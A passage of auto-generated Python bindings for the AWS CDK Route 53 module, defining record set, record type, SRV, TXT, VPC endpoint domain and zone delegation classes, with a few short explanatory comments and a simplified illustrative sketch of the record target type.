result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def vpc(self) -> aws_cdk.aws_ec2.IVpc:
'''A VPC that you want to associate with this hosted zone.
Private hosted zones must be associated with at least one VPC. You can
associate additional VPCs using ``addVpc(vpc)``.
'''
result = self._values.get("vpc")
assert result is not None, "Required property 'vpc' is missing"
return typing.cast(aws_cdk.aws_ec2.IVpc, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PrivateHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.PublicHostedZoneProps",
jsii_struct_bases=[CommonHostedZoneProps],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
"caa_amazon": "caaAmazon",
"cross_account_zone_delegation_principal": "crossAccountZoneDelegationPrincipal",
"cross_account_zone_delegation_role_name": "crossAccountZoneDelegationRoleName",
},
)
class PublicHostedZoneProps(CommonHostedZoneProps):
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
caa_amazon: typing.Optional[builtins.bool] = None,
cross_account_zone_delegation_principal: typing.Optional[aws_cdk.aws_iam.IPrincipal] = None,
cross_account_zone_delegation_role_name: typing.Optional[builtins.str] = None,
) -> None:
'''Construction properties for a PublicHostedZone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
:param caa_amazon: Whether to create a CAA record to restrict certificate authorities allowed to issue certificates for this domain to Amazon only. Default: false
:param cross_account_zone_delegation_principal: A principal which is trusted to assume a role for zone delegation. Default: - No delegation configuration
:param cross_account_zone_delegation_role_name: The name of the role created for cross account delegation. Default: - A role name is generated automatically
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
if caa_amazon is not None:
self._values["caa_amazon"] = caa_amazon
if cross_account_zone_delegation_principal is not None:
self._values["cross_account_zone_delegation_principal"] = cross_account_zone_delegation_principal
if cross_account_zone_delegation_role_name is not None:
self._values["cross_account_zone_delegation_role_name"] = cross_account_zone_delegation_role_name
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def caa_amazon(self) -> typing.Optional[builtins.bool]:
'''Whether to create a CAA record to restrict certificate authorities allowed to issue certificates for this domain to Amazon only.
:default: false
'''
result = self._values.get("caa_amazon")
return typing.cast(typing.Optional[builtins.bool], result)
@builtins.property
def cross_account_zone_delegation_principal(
self,
) -> typing.Optional[aws_cdk.aws_iam.IPrincipal]:
'''A principal which is trusted to assume a role for zone delegation.
:default: - No delegation configuration
'''
result = self._values.get("cross_account_zone_delegation_principal")
return typing.cast(typing.Optional[aws_cdk.aws_iam.IPrincipal], result)
@builtins.property
def cross_account_zone_delegation_role_name(self) -> typing.Optional[builtins.str]:
'''The name of the role created for cross account delegation.
:default: - A role name is generated automatically
'''
result = self._values.get("cross_account_zone_delegation_role_name")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PublicHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(IRecordSet)
class RecordSet(
aws_cdk.core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.RecordSet",
):
'''A record set.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
record_type: "RecordType",
target: "RecordTarget",
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param record_type: The record type.
:param target: The target for this record, either ``RecordTarget.fromValues()`` or ``RecordTarget.fromAlias()``.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = RecordSetProps(
record_type=record_type,
target=target,
zone=zone,
comment=comment,
record_name=record_name,
ttl=ttl,
)
jsii.create(RecordSet, self, [scope, id, props])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="domainName")
def domain_name(self) -> builtins.str:
'''The domain name of the record.'''
return typing.cast(builtins.str, jsii.get(self, "domainName"))
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.RecordSetOptions",
jsii_struct_bases=[],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
},
)
class RecordSetOptions:
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Options for a RecordSet.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RecordSetOptions(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.RecordSetProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"record_type": "recordType",
"target": "target",
},
)
class RecordSetProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
record_type: "RecordType",
target: "RecordTarget",
) -> None:
'''Construction properties for a RecordSet.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param record_type: The record type.
:param target: The target for this record, either ``RecordTarget.fromValues()`` or ``RecordTarget.fromAlias()``.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"record_type": record_type,
"target": target,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def record_type(self) -> "RecordType":
'''The record type.'''
result = self._values.get("record_type")
assert result is not None, "Required property 'record_type' is missing"
return typing.cast("RecordType", result)
@builtins.property
def target(self) -> "RecordTarget":
'''The target for this record, either ``RecordTarget.fromValues()`` or ``RecordTarget.fromAlias()``.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast("RecordTarget", result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RecordSetProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RecordTarget(
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.RecordTarget",
):
'''Type union for a record that accepts multiple types of target.'''
def __init__(
self,
values: typing.Optional[typing.Sequence[builtins.str]] = None,
alias_target: typing.Optional[IAliasRecordTarget] = None,
) -> None:
'''
:param values: Values that correspond with the chosen record type (e.g. for an 'A' record, specify one or more IP addresses).
:param alias_target: Alias for targets, such as a CloudFront distribution, to route traffic to.
'''
jsii.create(RecordTarget, self, [values, alias_target])
@jsii.member(jsii_name="fromAlias") # type: ignore[misc]
@builtins.classmethod
def from_alias(cls, alias_target: IAliasRecordTarget) -> "RecordTarget":
'''Use an alias as target.
:param alias_target: -
'''
return typing.cast("RecordTarget", jsii.sinvoke(cls, "fromAlias", [alias_target]))
@jsii.member(jsii_name="fromIpAddresses") # type: ignore[misc]
@builtins.classmethod
def from_ip_addresses(cls, *ip_addresses: builtins.str) -> "RecordTarget":
'''Use IP addresses as the target.
:param ip_addresses: -
'''
return typing.cast("RecordTarget", jsii.sinvoke(cls, "fromIpAddresses", [*ip_addresses]))
@jsii.member(jsii_name="fromValues") # type: ignore[misc]
@builtins.classmethod
def from_values(cls, *values: builtins.str) -> "RecordTarget":
'''Use string values as the target.
:param values: -
'''
return typing.cast("RecordTarget", jsii.sinvoke(cls, "fromValues", [*values]))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="aliasTarget")
def alias_target(self) -> typing.Optional[IAliasRecordTarget]:
'''Alias for targets, such as a CloudFront distribution, to route traffic to.'''
return typing.cast(typing.Optional[IAliasRecordTarget], jsii.get(self, "aliasTarget"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="values")
def values(self) -> typing.Optional[typing.List[builtins.str]]:
'''Values that correspond with the chosen record type (e.g. for an 'A' record, specify one or more IP addresses).'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "values"))
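``RecordTarget`` is described above as a "type union": a target holds either plain string ``values`` or an ``alias_target``, never both in normal use, and the ``from_values`` / ``from_alias`` class methods each populate exactly one side. A simplified stand-in (``MiniRecordTarget`` is illustrative, not the jsii-backed class):

```python
import typing


class MiniRecordTarget:
    """Simplified sketch of the RecordTarget union: values OR alias_target."""

    def __init__(
        self,
        values: typing.Optional[typing.List[str]] = None,
        alias_target: typing.Optional[object] = None,
    ) -> None:
        self.values = values
        self.alias_target = alias_target

    @classmethod
    def from_values(cls, *values: str) -> "MiniRecordTarget":
        # String targets, e.g. IP addresses for an 'A' record.
        return cls(values=list(values))

    @classmethod
    def from_alias(cls, alias_target: object) -> "MiniRecordTarget":
        # An alias target such as a CloudFront distribution.
        return cls(alias_target=alias_target)


a_record_target = MiniRecordTarget.from_values("192.0.2.1", "192.0.2.2")
```

Constructing via one factory leaves the other side ``None``, which is how downstream code distinguishes value records from alias records.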
@jsii.enum(jsii_type="@aws-cdk/aws-route53.RecordType")
class RecordType(enum.Enum):
'''The record type.'''
A = "A"
'''Route traffic to a resource, such as a web server, using an IPv4 address in dotted decimal notation.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#AFormat
'''
AAAA = "AAAA"
'''Route traffic to a resource, such as a web server, using an IPv6 address in colon-separated hexadecimal format.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#AAAAFormat
'''
CAA = "CAA"
'''A CAA record specifies which certificate authorities (CAs) are allowed to issue certificates for a domain or subdomain.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#CAAFormat
'''
CNAME = "CNAME"
'''A CNAME record maps DNS queries for the name of the current record, such as acme.example.com, to another domain (example.com or example.net) or subdomain (acme.example.com or zenith.example.org).
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#CNAMEFormat
'''
DS = "DS"
'''A delegation signer (DS) record refers to a zone key for a delegated subdomain zone.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#DSFormat
'''
MX = "MX"
'''An MX record specifies the names of your mail servers and, if you have two or more mail servers, the priority order.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#MXFormat
'''
NAPTR = "NAPTR"
'''A Name Authority Pointer (NAPTR) is a type of record that is used by Dynamic Delegation Discovery System (DDDS) applications to convert one value to another or to replace one value with another.
For example, one common use is to convert phone numbers into SIP URIs.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#NAPTRFormat
'''
NS = "NS"
'''An NS record identifies the name servers for the hosted zone.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#NSFormat
'''
PTR = "PTR"
'''A PTR record maps an IP address to the corresponding domain name.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#PTRFormat
'''
SOA = "SOA"
'''A start of authority (SOA) record provides information about a domain and the corresponding Amazon Route 53 hosted zone.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#SOAFormat
'''
SPF = "SPF"
'''SPF records were formerly used to verify the identity of the sender of email messages.
Instead of an SPF record, we recommend that you create a TXT record that contains the applicable value.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#SPFFormat
'''
SRV = "SRV"
'''An SRV record Value element consists of four space-separated values.
The first three values are decimal numbers representing priority, weight, and port.
The fourth value is a domain name.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#SRVFormat
'''
TXT = "TXT"
'''A TXT record contains one or more strings that are enclosed in double quotation marks (").
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#TXTFormat
'''
class SrvRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.SrvRecord",
):
'''A DNS SRV record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence["SrvRecordValue"],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = SrvRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(SrvRecord, self, [scope, id, props])
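# Example (illustrative sketch, assuming `stack` is an existing Stack and `zone`
# an IHostedZone defined elsewhere; the host name, port, priority, and weight
# are placeholders):
#
#     SrvRecord(stack, "Srv",
#         zone=zone,
#         record_name="_service._tcp",
#         values=[SrvRecordValue(
#             host_name="server.example.com",
#             port=443,
#             priority=10,
#             weight=5,
#         )],
#     )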
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.SrvRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class SrvRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence["SrvRecordValue"],
) -> None:
'''Construction properties for an SrvRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List["SrvRecordValue"]:
'''The values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List["SrvRecordValue"], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SrvRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.SrvRecordValue",
jsii_struct_bases=[],
name_mapping={
"host_name": "hostName",
"port": "port",
"priority": "priority",
"weight": "weight",
},
)
class SrvRecordValue:
def __init__(
self,
*,
host_name: builtins.str,
port: jsii.Number,
priority: jsii.Number,
weight: jsii.Number,
) -> None:
'''Properties for a SRV record value.
:param host_name: The server host name.
:param port: The port.
:param priority: The priority.
:param weight: The weight.
'''
self._values: typing.Dict[str, typing.Any] = {
"host_name": host_name,
"port": port,
"priority": priority,
"weight": weight,
}
@builtins.property
def host_name(self) -> builtins.str:
'''The server host name.'''
result = self._values.get("host_name")
assert result is not None, "Required property 'host_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def port(self) -> jsii.Number:
'''The port.'''
result = self._values.get("port")
assert result is not None, "Required property 'port' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def priority(self) -> jsii.Number:
'''The priority.'''
result = self._values.get("priority")
assert result is not None, "Required property 'priority' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def weight(self) -> jsii.Number:
'''The weight.'''
result = self._values.get("weight")
assert result is not None, "Required property 'weight' is missing"
return typing.cast(jsii.Number, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SrvRecordValue(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class TxtRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.TxtRecord",
):
'''A DNS TXT record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The text values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = TxtRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(TxtRecord, self, [scope, id, props])
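# Example (illustrative sketch, assuming `stack` and `zone` exist; the SPF-style
# string is a placeholder value):
#
#     TxtRecord(stack, "Txt",
#         zone=zone,
#         values=["v=spf1 include:example.com ~all"],
#         ttl=aws_cdk.core.Duration.minutes(5),
#     )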
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.TxtRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class TxtRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a TxtRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The text values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[builtins.str]:
'''The text values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TxtRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class VpcEndpointServiceDomainName(
aws_cdk.core.Construct,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.VpcEndpointServiceDomainName",
):
'''A Private DNS configuration for a VPC endpoint service.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
domain_name: builtins.str,
endpoint_service: aws_cdk.aws_ec2.IVpcEndpointService,
public_hosted_zone: IPublicHostedZone,
) -> None:
'''
:param scope: -
:param id: -
:param domain_name: The domain name to use. This domain name must be owned by this account (registered through Route53), or delegated to this account. Domain ownership will be verified by AWS before private DNS can be used.
:param endpoint_service: The VPC Endpoint Service to configure Private DNS for.
:param public_hosted_zone: The public hosted zone to use for the domain.
'''
props = VpcEndpointServiceDomainNameProps(
domain_name=domain_name,
endpoint_service=endpoint_service,
public_hosted_zone=public_hosted_zone,
)
jsii.create(VpcEndpointServiceDomainName, self, [scope, id, props])
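# Example (illustrative sketch, assuming `stack`, an IVpcEndpointService
# `endpoint_service`, and an IPublicHostedZone `public_zone` exist; the domain
# name is a placeholder):
#
#     VpcEndpointServiceDomainName(stack, "EndpointDomain",
#         endpoint_service=endpoint_service,
#         domain_name="my-endpoint.example.com",
#         public_hosted_zone=public_zone,
#     )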
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.VpcEndpointServiceDomainNameProps",
jsii_struct_bases=[],
name_mapping={
"domain_name": "domainName",
"endpoint_service": "endpointService",
"public_hosted_zone": "publicHostedZone",
},
)
class VpcEndpointServiceDomainNameProps:
def __init__(
self,
*,
domain_name: builtins.str,
endpoint_service: aws_cdk.aws_ec2.IVpcEndpointService,
public_hosted_zone: IPublicHostedZone,
) -> None:
'''Properties to configure a VPC Endpoint Service domain name.
:param domain_name: The domain name to use. This domain name must be owned by this account (registered through Route53), or delegated to this account. Domain ownership will be verified by AWS before private DNS can be used.
:param endpoint_service: The VPC Endpoint Service to configure Private DNS for.
:param public_hosted_zone: The public hosted zone to use for the domain.
'''
self._values: typing.Dict[str, typing.Any] = {
"domain_name": domain_name,
"endpoint_service": endpoint_service,
"public_hosted_zone": public_hosted_zone,
}
@builtins.property
def domain_name(self) -> builtins.str:
'''The domain name to use.
This domain name must be owned by this account (registered through Route53),
or delegated to this account. Domain ownership will be verified by AWS before
private DNS can be used.
:see: https://docs.aws.amazon.com/vpc/latest/userguide/endpoint-services-dns-validation.html
'''
result = self._values.get("domain_name")
assert result is not None, "Required property 'domain_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def endpoint_service(self) -> aws_cdk.aws_ec2.IVpcEndpointService:
'''The VPC Endpoint Service to configure Private DNS for.'''
result = self._values.get("endpoint_service")
assert result is not None, "Required property 'endpoint_service' is missing"
return typing.cast(aws_cdk.aws_ec2.IVpcEndpointService, result)
@builtins.property
def public_hosted_zone(self) -> IPublicHostedZone:
'''The public hosted zone to use for the domain.'''
result = self._values.get("public_hosted_zone")
assert result is not None, "Required property 'public_hosted_zone' is missing"
return typing.cast(IPublicHostedZone, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointServiceDomainNameProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.ZoneDelegationOptions",
jsii_struct_bases=[],
name_mapping={"comment": "comment", "ttl": "ttl"},
)
class ZoneDelegationOptions:
def __init__(
self,
*,
comment: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Options available when creating a delegation relationship from one PublicHostedZone to another.
:param comment: A comment to add on the DNS record created to incorporate the delegation. Default: none
:param ttl: The TTL (Time To Live) of the DNS delegation record in DNS caches. Default: 172800 seconds (2 days)
'''
self._values: typing.Dict[str, typing.Any] = {}
if comment is not None:
self._values["comment"] = comment
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the DNS record created to incorporate the delegation.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The TTL (Time To Live) of the DNS delegation record in DNS caches.
:default: 172800 seconds (2 days)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ZoneDelegationOptions(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class ZoneDelegationRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.ZoneDelegationRecord",
):
'''A record to delegate further lookups to a different set of name servers.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
name_servers: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param name_servers: The name servers to report in the delegation records.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = ZoneDelegationRecordProps(
name_servers=name_servers,
zone=zone,
comment=comment,
record_name=record_name,
ttl=ttl,
)
